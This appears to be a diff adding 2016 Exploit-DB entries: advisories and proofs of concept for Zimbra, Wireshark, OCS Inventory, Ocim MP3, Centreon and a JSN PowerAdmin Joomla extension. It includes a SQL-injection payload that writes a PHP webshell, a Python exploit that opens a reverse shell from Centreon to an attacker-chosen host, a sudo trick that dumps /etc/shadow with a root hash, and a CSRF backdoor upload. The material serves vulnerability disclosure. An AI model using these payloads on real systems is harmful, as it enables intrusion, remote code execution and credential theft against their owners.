preferences part of old releases of Zimbra are vulnerable +to CSRF because of the lack of a CSRF token identifying a valid session. +As a consequence, requests can be forged and played arbitrarily. + +**Access Vector**: remote +**Security Risk**: low +**Vulnerability**: CWE-352 +**CVSS Base score**: 5.8 + +---------------- +Proof of Concept +---------------- + + + +
+ +
+ + + + + +Solution +======== + +Sensitive forms should be protected by a CSRF token. + + +Fixes +===== + +Fixed with 8.5 release : bug 83547 +(https://wiki.zimbra.com/wiki/Security/Collab/86#Notes_from_8.5) + + +Affected versions +================= + + * Zimbra <= 8.0.9 GA Release + + +Credits +======= + + * Anthony LAOU-HINE TSUEI, Sysdream (laouhine_anthony -at- hotmail +-dot- fr) + * Damien CAUQUIL, Sysdream (d.cauquil -at- sysdream -dot- com) \ No newline at end of file diff --git a/platforms/multiple/dos/39503.txt b/platforms/multiple/dos/39503.txt new file mode 100755 index 000000000..f8dfbc82b --- /dev/null +++ b/platforms/multiple/dos/39503.txt @@ -0,0 +1,105 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=651 + +The following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"): + +--- cut --- +==14146==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000003a0 at pc 0x000000b2c8eb bp 0x7ffdfc45fa70 sp 0x7ffdfc45fa68 +READ of size 1 at 0x6070000003a0 thread T0 + #0 0xb2c8ea in print_hex_data_buffer wireshark/epan/print.c:987:13 + #1 0xb2bf43 in print_hex_data wireshark/epan/print.c:904:14 + #2 0x5422e2 in print_packet wireshark/tshark.c:4155:10 + #3 0x53cb2e in process_packet wireshark/tshark.c:3742:7 + #4 0x535d90 in load_cap_file wireshark/tshark.c:3484:11 + #5 0x52c1df in main wireshark/tshark.c:2197:13 + +0x6070000003a0 is located 0 bytes inside of 65-byte region [0x6070000003a0,0x6070000003e1) +freed by thread T0 here: + #0 0x4d6ce0 in free llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:30 + #1 0xc1fd8e in real_free wireshark/epan/tvbuff_real.c:47:3 + #2 0xc2229c in tvb_free_internal wireshark/epan/tvbuff.c:110:3 + #3 0xc22049 in tvb_free_chain wireshark/epan/tvbuff.c:135:3 + #4 0xc21ed1 in tvb_free wireshark/epan/tvbuff.c:125:2 + #5 0xbc972e in free_all_fragments wireshark/epan/reassemble.c:351:4 + #6 0xbd40e5 in fragment_add_seq_common wireshark/epan/reassemble.c:1919:5 + #7 0xbd4895 in fragment_add_seq_check_work wireshark/epan/reassemble.c:2006:12 + #8 0xbd43a7 in fragment_add_seq_check wireshark/epan/reassemble.c:2050:9 + #9 0x2fb8256 in dissect_mux27010 wireshark/epan/dissectors/packet-mux27010.c:949:28 + #10 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #11 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9 + #12 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9 + #13 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11 + #14 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #15 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9 + #16 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8 + #17 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8 + #18 0xadffde in dissect_record wireshark/epan/packet.c:501:3 + #19 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2 + #20 0x53c91b in process_packet wireshark/tshark.c:3728:5 + #21 0x535d90 in load_cap_file wireshark/tshark.c:3484:11 + #22 0x52c1df in main wireshark/tshark.c:2197:13 + +previously allocated by thread T0 here: + #0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40 + #1 0x7ff6062f0610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610) + #2 0xbe1202 in fragment_add_seq_work wireshark/epan/reassemble.c:1793:2 + #3 0xbd4181 in fragment_add_seq_common wireshark/epan/reassemble.c:1925:6 + #4 0xbd4895 in fragment_add_seq_check_work wireshark/epan/reassemble.c:2006:12 + #5 0xbd43a7 in fragment_add_seq_check wireshark/epan/reassemble.c:2050:9 + #6 0x2fb8256 in dissect_mux27010 wireshark/epan/dissectors/packet-mux27010.c:949:28 + #7 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #8 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9 + #9 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9 + #10 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11 + #11 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #12 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9 + #13 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8 + #14 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8 + #15 0xadffde in dissect_record wireshark/epan/packet.c:501:3 + #16 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2 + #17 0x53c91b in process_packet wireshark/tshark.c:3728:5 + #18 0x535d90 in load_cap_file wireshark/tshark.c:3484:11 + #19 0x52c1df in main wireshark/tshark.c:2197:13 + +SUMMARY: AddressSanitizer: heap-use-after-free wireshark/epan/print.c:987:13 in print_hex_data_buffer +Shadow bytes around the buggy address: + 0x0c0e7fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c0e7fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c0e7fff8040: fa fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd + 0x0c0e7fff8050: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd + 0x0c0e7fff8060: fd fd fa fa fa fa fd fd fd fd fd fd fd fd fd fd +=>0x0c0e7fff8070: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fa fa fa + 0x0c0e7fff8080: fa fa fd fd fd fd fd fd fd fd fd fa fa fa fa fa + 0x0c0e7fff8090: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fd fd + 0x0c0e7fff80a0: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd + 0x0c0e7fff80b0: fd fd fd fd fd fa fa fa fa fa 00 00 00 00 00 00 + 0x0c0e7fff80c0: 00 00 06 fa fa fa fa fa 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==14146==ABORTING +--- cut --- + +The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11799. Attached are three files which trigger the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39503.zip + diff --git a/platforms/php/webapps/39458.txt b/platforms/php/webapps/39458.txt new file mode 100755 index 000000000..98136f9eb --- /dev/null +++ b/platforms/php/webapps/39458.txt @@ -0,0 +1,37 @@ +# Exploit Title: OCS Inventory NG <= 2.2 - Search with various criteria SQL Injection and Code execution +# Date: 17-02-2016 +# Exploit Author: Ephreet +# Software Link: http://www.ocsinventory-ng.org/en/download/ +# Version: <=2.2 +# Category: webapps +# Tested on: Debian 3.2.73-2+deb7u2 (MySQL 5.5.47-0+deb7u1, Apache/2.2.22), CentOS 6/7 + + +1. Description + +Custom search allows for SQL Injection, while default configuration allows for file write as MySQL user. +Search field fails to escape MySQL special characters, allowing file creation and code execution. + +If permissions are not carefully set, one could write to web/crontab folders. + +Infrustructure note: this was tested on a single machine, but still applies to multiple servers environments, affecting the DB host. + + +2. Proof of Concept + +At least a low priv user must be logged and access the search function on http:///ocsreports/index.php?function=visu_search + +- Time-based SQL Injection +Choose a parameter, use EXACTLY operator: +')) union select sleep(5); # + +- Code execution +Bypass input escape and write to filesystem (webshell PoC): +')) union select CONCAT(char(60),char(63),'php echo exec($_GET[',char(39),'cmd',char(39),']);',char(63),char(62)) into outfile '/usr/share/ocsinventory-reports/ocsreports/plugins/main_sections/conf/shell.php'; # + + +3. Solution + +Run MySQL/Apache services as restricted user. +Restrict file write permissions to ocs DB user. +Watch out for weak permissions on /usr/share/ocsinventory-reports/ocsreports/plugins/main_sections/conf/ (it is often set to full write by inexperienced admins). \ No newline at end of file diff --git a/platforms/php/webapps/39498.txt b/platforms/php/webapps/39498.txt new file mode 100755 index 000000000..41873879e --- /dev/null +++ b/platforms/php/webapps/39498.txt @@ -0,0 +1,32 @@ +======== +Ocim MP3 Plugin SQL Injection Vulnerability +======== + +:----------------------------------------------------------------------------------------------------: +: # Exploit Title : Ocim MP3 Plugin SQL Injection Vulnerability +: # Date : 26 February 2016 +: # Author : xevil and Blankon33 +: # Vendor Site: http://www.ocimscripts.com/ +: # Version: +: # Vulnerability : SQL Injection +: # Tested on : Wordpress 4.4.2 +: # Severity : High +:----------------------------------------------------------------------------------------------------: + +Summary +======== +Ocim MP3 is Plugin to make MP3 Grabber site based on Wordpress. + +Proof of Concept +======== +Infected URL: +http://[Site]/[Path]/wp-content/plugins/ocim-mp3/source/pages.php?id=['SQLi] + + +Admin Panel: +http://[Site]/[Path]/oc-login.php + +=========== +Thanks to +=========== +All Indonesian Hacker!!! diff --git a/platforms/php/webapps/39501.txt b/platforms/php/webapps/39501.txt new file mode 100755 index 000000000..c6bc1ef5a --- /dev/null +++ b/platforms/php/webapps/39501.txt @@ -0,0 +1,179 @@ +Unauthenticated Remote Command Execution in Centreon Web Interface +================================================================== + + +Description +=========== + +Centreon is a popular monitoring solution. + +A critical vulnerability has been found in the Centreon logging class +allowing remote users to execute arbitrary commands. + + +SQL injection leading to RCE +============================ + +Centreon logs SQL database errors in a log file using the "echo" system +command and the exec() PHP function. On the authentification class, +Centreon use htmlentities with the ENT_QUOTES options to filter SQL +entities. +However, Centreon doesn't filter the SQL escape character "\" and it is +possible to generate an SQL Error. +Because of the use of the "echo" system command with the PHP exec() +function, and because of the lack of sanitization, it is possible to +inject arbitrary system commands. + +**Access Vector**: remote + +**Security Risk**: high + +**Vulnerability**: CWE-78 + +---------------- +Proof of Concept +---------------- + +TCP Reverse Shell using python. + + #!/usr/bin/env python + import requests + import argparse + + def shell(target, reverseip, reverseport): + payload = 'import socket as a,subprocess as b,os as +c;s=a.socket(2,1);s.connect(("%s",%d));d=s.fileno();c.dup2(d,0);c.dup2(d,1);c.dup2(d,2);p=b.call(["sh"]);' +% (reverseip,reverseport) + print "[~] Starting reverseshell : %s - port : %d" % (reverseip, +reverseport) + req = requests.post(target, data={"useralias": "$(echo %s | +base64 -d | python)\\" % payload.encode("base64").replace("\n",""), +"password": "foo"}) + print "[+] DEAD !" + + if __name__ == "__main__": + print "[~] Centreon Unauthentificated RCE - Nicolas Chatelain +" + parser = argparse.ArgumentParser() + parser.add_argument("--target", required=True) + parser.add_argument("--reverseip", required=True) + parser.add_argument("--reverseport", required=True, type=int) + args = parser.parse_args() + shell(args.target, args.reverseip, args.reverseport) + +Shell : + + nightlydev@nworkstation ~/Lab/Centreon $ python reverseshell.py +--target=http://172.16.138.137/centreon/index.php +--reverseip=172.16.138.1 --reverseport 8888 + [~] Centreon Unauthentificated RCE - Nicolas Chatelain + + [~] Starting reverseshell : 172.16.138.1 - port : 8888 + +# Other term + +nightlydev@nworkstation ~/Lab/Centreon $ nc -lvp 8888 +Ncat: Version 6.45 ( http://nmap.org/ncat ) +Ncat: Listening on :::8888 +Ncat: Listening on 0.0.0.0:8888 +Ncat: Connection from 172.16.138.135. +Ncat: Connection from 172.16.138.135:50050. +whoami +apache +groups +apache centreon-engine centreon-broker centreon nagios + + +--------------- +Vulnerable code +--------------- + +The vulnerable code is located in class/centreonLog.class.php, line 82 +and line 154: + + + /* + * print Error in log file. + */ + exec("echo \"".$string."\" >> ".$this->errorType[$id]); + +In class/centreonAuth.class.php, line 227: + + $DBRESULT = $this->pearDB->query("SELECT * FROM `contact` WHERE +`contact_alias` = '" . htmlentities($username, ENT_QUOTES, "UTF-8") . "' +AND `contact_activate` = '1' AND `contact_register` = '1' LIMIT 1"); + + +-------- +Solution +-------- + +Update to the Centreon 2.5.4 + + +Possible root password disclosure in centengine (Centreon Entreprise Server) +============================================================================ + +In some configurations, when centengine can run as root (with sudo). +It's possible to read some file content. + +**Access Vector**: local + +**Security Risk**: high + +**Vulnerability**: CWE-209 + +---------------- +Proof of Concept +---------------- + + $ sudo /usr/sbin/centengine -v /etc/shadow + [1416391088] reading main config file + [1416391088] error while processing a config file: [/etc/shadow:1] +bad variable name: +'root:$6$3mvvEHQM3p3afuh4$DZ377daOy.8bn42t7ur82/Geplvsj90J7cs1xsgAbRZ0JDZ8KdB5CcQ0ucF5dwKpnBYLon1XBqjJPqpm6Zr5R0:16392:0:99999:7:::' + [1416391088] + +--------------- +Vulnerable code +--------------- + +In Centreon Entreprise Server (CES) : /etc/sudoers.d/centreon + +CENTREON ALL = NOPASSWD: /usr/sbin/centengine -v * + +-------- +Solution +-------- + +Do not allow centengine to be run as root or do not disclose the line +that caused the error. + +Timeline (dd/mm/yyyy) +===================== + +* 18/11/2014 : Initial discovery +* 26/11/2014 : Contact with Centreon team +* 27/11/2014 : Centreon correct vulnerabilities +* 27/11/2014 : Centreon release version 2.5.4 that fixes vulnerabilities + +Fixes +===== + +* +https://github.com/centreon/centreon/commit/a6dd914418dd185a698050349e05f10438fde2a9 +* +https://github.com/centreon/centreon/commit/d00f3e015d6cf64e45822629b00068116e90ae4d +* +https://github.com/centreon/centreon/commit/015e875482d7ff6016edcca27bffe765c2bd77c1 + +Affected versions +================= + +* Centreon <= 2.5.3 + + +Credits +======= + +* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com) \ No newline at end of file diff --git a/platforms/php/webapps/39506.txt b/platforms/php/webapps/39506.txt new file mode 100755 index 000000000..36fc36009 --- /dev/null +++ b/platforms/php/webapps/39506.txt @@ -0,0 +1,122 @@ +--------------------------------------------------------- +RatioSec Research Security Advisory RS-2016-001 +--------------------------------------------------------- + +JSN PowerAdmin Joomla! Extension Remote Command Execution Via CSRF and +XSS vulnerabilities +--------------------------------------------------------- + +Product: JSN PowerAdmin Joomla! Extension +Vendor: JoomlaShine.com +Tested Versions: 2.3.0 +Other Vulnerable Versions: Prior versions may also be affected +Vendor Notification: 28th January, 2016 +Advisory Publication: 24th February, 2016 +CVE Reference: Pending +RatioSec Advisory Reference: RS-2016-001 +Risk Level: High +CVSSv3 Base Score: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L + +--------------------------------------------------------- + +RatioSec Research has discovered two cross-site request forgery and +reflected cross-site scripting vulnerabilities in JSN PowerAdmin +Joomla! Extension which can be exploited, respectively, to upload PHP +files and run arbitrary HTML and script code in a user's browser +session in context of the affected web site. + +1) The application allows users to perform certain actions via HTTP +requests without performing proper checks to verify the requests +validity. An authenticated user's browser can be forced to upload PHP +files via the extension installer and subsequently execute arbitrary +commands with the web server privileges by tricking the user into +visiting a malicious web site. + +2) Input passed to `identified_name` GET parameter when `package` is +set, `option` is set to `com_poweradmin`, `view` is set to +`installer`, and `task` is set to `installer.install` in +`/administrator/index.php` is not properly sanitised before being +reflected. This can be exploited to run arbitrary HTML and script code +in a user's browser session in context of the affected web site. + +--------------------------------------------------------- + +Proof of Concept + +Read the advisory details on the RatioSec Research website for the +proof of concept code. +http://www.ratiosec.com/2016/jsn-poweradmin-joomla-extension-rce-via-csrf-and-xss/ + +---------------------------------------------------------- + +Solution + +No official solution is currently available. + +---------------------------------------------------------- + +Timeline + +- First contact: 27th January, 2016 +- Disclosure: 28th January, 2016. Preliminary date set to 10th, February 2016. +- E-mail notice after no response: 02nd February, 2016 +- Advisory Publication: 24th February, 2016 + +---------------------------------------------------------- + +Advisory URL + +http://www.ratiosec.com/2016/jsn-poweradmin-joomla-extension-rce-via-csrf-and-xss/ + +RatioSec Research + +Mail: research at ratiosec dot com +Web: http://www.ratiosec.com/ +Twitter: https://twitter.com/ratio_sec + + + +---------------- +Proof Of Concept + +1) The following HTML page exploits the cross-site request forgery vulnerability and uploads a malicious PHP script system($_GET['cmd']); as /tmp/bd.phtml if visited by a logged-in administrator. + + + + +
+ +
+ + + +The file extension .phtml and the tags are used here to fool the Joomla API JFile::upload() file validation checks. As result, the backdoor is installed permanently as /tmp/bd.phtml which can be used lately by the attacker to obtain the full system compromise. + +Command Execution + +2) The following URL exploits the cross-site scripting vulnerability to execute javascript code in a logged-in administrator’s browser. + +http://localhost/joomla/administrator/index.php?package=foobar&option=com_poweradmin&view=installer&task=installer.install&identified_name= \ No newline at end of file